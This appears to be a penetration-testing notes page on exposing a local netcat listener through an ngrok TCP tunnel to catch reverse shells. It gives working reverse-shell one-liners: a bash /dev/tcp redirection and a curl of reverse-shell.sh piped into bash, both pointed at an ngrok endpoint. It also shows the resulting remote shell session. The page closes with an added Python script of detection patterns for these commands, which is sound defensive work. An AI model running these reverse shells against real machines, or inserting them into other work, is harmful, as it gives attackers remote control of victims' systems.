# ngrok

## Overview

* [ngrok](https://ngrok.com/) is a pretty sweet solution for a secure ingress gateway for your apps, services, and APIs. Check [the docs](https://ngrok.com/use-cases) to see its use cases
* With it, we can expose local networked services (like a TCP listener, SSH, or web server) to the public internet through a unique ngrok-generated URL
* There are methods to build authentication or allowlisting around this but they're not part of the free tier

### Registration

* After signing up for a free ngrok account, follow the [setup instructions](https://dashboard.ngrok.com/get-started/setup/linux) to get ngrok set up on your machine

***

## Example - Reverse Shell

### Ngrok and local listener setup

* On your machine, start an ngrok TCP tunnel that forwards to local port 1337

{% code overflow="wrap" %}

```bash
ngrok tcp 1337
```

{% endcode %}

* This will provide you with a free forwarding address (you can also set up a custom domain)

{% code overflow="wrap" %}

```bash
ngrok

Policy Management Examples http://ngrok.com/apigwexamples

Session Status                online
Account                       cal (Plan: Free)
Version                       3.18.2
Region                        United States (California) (us-cal-1)
Web Interface                 http://127.0.0.1:4040
Forwarding                    tcp://2.tcp.us-cal-1.ngrok.io:11412 -> localhost:1337

Connections                   ttl     opn     rt1     rt5     p50     p90
                              0       0       0.00    0.00    0.00    0.00
```

{% endcode %}

* You will need a way to catch incoming connections; `nc` works for this:

{% code overflow="wrap" %}

```bash
nc -nvlp 1337
```

{% endcode %}

### Reverse shell setup and execution

* On a different machine, execute a reverse shell and the traffic should be sent to your machine
* Check out [pentestmonkey](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) and [revshells](https://www.revshells.com/) for additional reverse shell options

{% code overflow="wrap" %}

```bash
bash -c 'bash -i >& /dev/tcp/2.tcp.us-cal-1.ngrok.io/11412 0>&1'
```

{% endcode %}

* Tip - `/dev/tcp/<host>/<port>` is a bash redirection feature, not a real file, so running the redirection directly in another shell such as zsh fails with an error like the one below. Either make sure the current shell is bash, or call bash explicitly as in the command above, which works from any shell so long as bash is installed

{% code overflow="wrap" %}

```
zsh: no such file or directory: /dev/tcp/2.tcp.us-cal-1.ngrok.io/11412
```

{% endcode %}

* Another option is to use [reverse-shell.sh](https://reverse-shell.sh/) which acts as a reverse shell as a service
* You can go to this URL directly in your browser and see the script that would execute

{% code overflow="wrap" %}

```bash
curl https://reverse-shell.sh/2.tcp.us-cal-1.ngrok.io:11412 | bash
```

{% endcode %}

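* Once the shell has successfully executed, you should see the connection in your listener (e.g., `nc`). The source address shows as 127.0.0.1 because the local ngrok agent relays the tunnel traffic to the listener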

{% code overflow="wrap" %}

```bash
nc -nvlp 1337

listening on [any] 1337 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56240
bash: no job control in this shell

The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.

bash-3.2$ whoami
tyler

bash-3.2$ hostname
TylerMBP.local

bash-3.2$  
```

{% endcode %}
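
* From the defender's side, the commands above leave recognisable traces in process command-line logs. The script below is an added example, not part of the original page: it flags those traces in constructed sample records. The log format, rule names, and function names are assumptions made for illustration

{% code overflow="wrap" %}

```python
import re

# Hypothetical rule names; the patterns are derived from the commands shown on this page.
RULES = {
    # bash's /dev/tcp/<host>/<port> pseudo-device used in a redirection
    "bash_dev_tcp": re.compile(r"/dev/tcp/([^/\s]+)/(\d{1,5})"),
    # ngrok TCP tunnel endpoint, e.g. 2.tcp.us-cal-1.ngrok.io:11412
    "ngrok_tcp_endpoint": re.compile(
        r"\b(\d+\.tcp\.(?:[a-z0-9-]+\.)?ngrok\.io)[:/](\d{1,5})\b"),
    # a download piped straight into a shell interpreter
    "download_piped_to_shell": re.compile(
        r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"),
}

# Assumed record format: "<timestamp> host=<h> user=<u> cmd=<full command line>"
LINE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")


def scan(lines):
    """Return one finding per record whose command line matches any rule."""
    findings = []
    for raw in lines:
        m = LINE.match(raw.strip())
        if not m:
            continue  # not a process-execution record in the assumed format
        cmd = m["cmd"]
        hits = sorted(name for name, rx in RULES.items() if rx.search(cmd))
        if not hits:
            continue
        # Prefer the ngrok endpoint; fall back to any /dev/tcp target.
        ep = RULES["ngrok_tcp_endpoint"].search(cmd) or RULES["bash_dev_tcp"].search(cmd)
        findings.append({"ts": m["ts"], "host": m["host"], "user": m["user"],
                         "rules": hits,
                         "endpoint": f"{ep[1]}:{ep[2]}" if ep else None})
    return findings


# Constructed sample records (hosts, users, and timestamps are made up).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z host=ws01 user=alice cmd=bash -c 'bash -i >& /dev/tcp/2.tcp.us-cal-1.ngrok.io/11412 0>&1'
2024-05-01T10:00:05Z host=ws02 user=bob cmd=curl https://reverse-shell.sh/2.tcp.us-cal-1.ngrok.io:11412 | bash
2024-05-01T10:00:09Z host=ws03 user=carol cmd=curl -fsSL https://example.com/index.html -o /tmp/index.html
""".splitlines()

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

{% endcode %}

* The first two sample records are flagged and the plain `curl` download is not. In practice, feed `scan()` command lines from your EDR or auditd execve records, after mapping them to the assumed format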
